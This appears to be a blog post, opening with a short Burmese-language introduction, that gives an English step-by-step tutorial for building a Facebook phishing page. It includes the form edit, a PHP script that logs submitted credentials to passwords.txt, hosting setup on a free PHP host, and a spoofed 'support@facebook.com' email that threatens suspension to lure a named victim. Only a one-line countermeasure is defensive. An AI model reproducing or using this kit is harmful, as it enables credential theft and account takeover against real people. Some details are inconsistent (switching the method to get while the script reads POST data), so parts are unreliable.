Phising ဆိုတာတစ္ေယာက္ေယာက္အသြင္အေယာင္ေဆာင္ပီး
ဥပမာသင္ေငြထည္.ထားတဲ.ဘဏ္ကေနသင္.ဆီအီးေမးလ္းပို.သလိုနဲ
Web Page တစ္ခုကိုေရာက္သြားပါလိမ္.မယ္..အဲဒီ Page က (Fake Page) အတုႀကီးပါ..။
You need 3 files Index.html, phish.php, passwords.txt to create a fake facebook login page.
To create index.html:
First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “index” in file name and select “web page complete” from save as menu. Once done you will have a file named “index.html” and a folder named “index_files”. Folder will have several files in it, let them as it is and open index.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.
action="https://www.facebook.com/login.php?login_attempt=1"
Now replace this string with action= “phish.php” and also change the method in html from 'post' to 'get'.
save the document.
To create phish.php:
Now open notepad type following php code in it and create phish.php.
<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1 ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
Now simply create text document and rename it as passwords.txt
Now you'll need a free web hosting service that supports PHP. I suggest you to use http://www.000webhost.com/
Open the site and create an account. Once you have created your account, you login to your account and go to control panel.
In the control panel choose file manager and upload the 3 files index.html, phish.php, passwords.txt in public directory.
Now create a new directory there and name it as index_files. Now open it and upload all the files in index_files folder formed while saving facebook page to it.
Don't forget to change Chmod permissions for passwords.txt to 777. Once done make index.html your index page and make site live.
Now create a spoofed email using my Anonymous mailer, from support@facebook.com to your victim.
Sub: Invalid activity on your facebook account.
Body:
Hey (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site> normally it will be http://yourusername.somex.com/index.html
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.
support@facebook.com,
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US
If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in passwords.txt file.
Countermeasure:
You must not reply any message from facebook may it be legitimate or not by clicking on any links that appear in mail box. Better whenever you receive any mail of this type report it to facebook.com by logging via typing www.facebook.com in your web browser.
No comments :